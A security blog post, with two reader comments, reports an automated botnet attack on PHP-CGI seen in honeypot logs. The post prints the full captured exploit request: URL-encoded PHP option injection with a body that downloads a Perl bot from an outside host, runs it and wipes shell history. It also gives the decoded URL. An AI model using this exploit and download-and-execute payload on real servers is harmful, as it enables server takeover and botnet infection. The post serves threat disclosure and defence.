Blog

Latest PHP exploit is now automated to attack IP addresses

During analysis of our ZIONSECURED logs we noticed that an automated attack against PHP is going on, using a vulnerability in Apache. Our friends at Spiderlabs already blogged about this last week, see http://blog.spiderlabs.com/2013/11/honeypot-alert-more-php-cgi-scanning-....

There is however a difference in the payload, so we can assume that other botnets are re-using the exploit.

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

<? system("cd /tmp;wget ircsoft.biz/wow;perl wow;rm -rf wow;history -c;history -n"); ?>

Decoding the URL gives:

cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

ScanSafe web proxy in the cloud blocked access to this URL:

Access Denied

The web resource http://ircsoft.biz/wow has been deemed by your administrator to be unsafe or unsuitable for you to access. The resource has been blocked. No further action is required.

Reason: Mal/PerlBot-A

There are 2 Comments

user picture

Do you see the file on the filesystem? It is possible that other bots are trying to identify vulnerable servers so that's why you see the GET-requests in Apache access logs

user picture

Hello, how I can know if my server has been damage with this xploit? I have this shell in my log of apache, but I was installed in january whith the repositories of ubuntu 13

Add comment